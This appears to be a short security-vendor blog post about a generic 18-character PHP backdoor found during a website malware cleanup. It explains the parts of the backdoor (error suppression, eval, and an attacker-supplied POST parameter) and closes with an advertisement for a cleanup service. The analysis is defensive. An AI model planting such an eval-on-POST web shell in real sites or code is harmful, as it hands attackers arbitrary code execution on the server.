14 Jun, 2017

Short, Simple and Effective Generic PHP Backdoor Malware

Learn how to detect and remove a generic PHP backdoor malware that can execute any malicious code submitted by attackers.
PHP is a general server-side scripting language providing very reach arsenal for web development. As a part of it, PHP provides broad capabilities to develop generic shells that can run on almost every website.

In the recent website malware cleanup process, we detected generic shell that occupied only 18 characters. The following is the code of this shell capable of executing any arbitrary malicious content submitted by attackers.
This shell has three major parts:

  • @ - PHP Error control operator making PHP interpreter to ignore any occured error (http://php.net/manual/en/language.operators.errorcontrol.php)
  • eval - Evaluate a string as PHP code and allows execution of arbitrary PHP code provided as an input string
  • $_POST[yt] - Is actually shell payload submitted by attacker
Following is example of HTML side code used to submit the shell payload
Is your website flagged for malware, blocked by the search engines or disabled by the host?
Our experts are here to clean up any malware from your sites and remove false-positives, blacklisting and other kinds of alerts by any security vendor and search engines. Just select appropriate ThreatSign! Anti-Malware plan and get back online.

For other issues and help: Quttera help-desk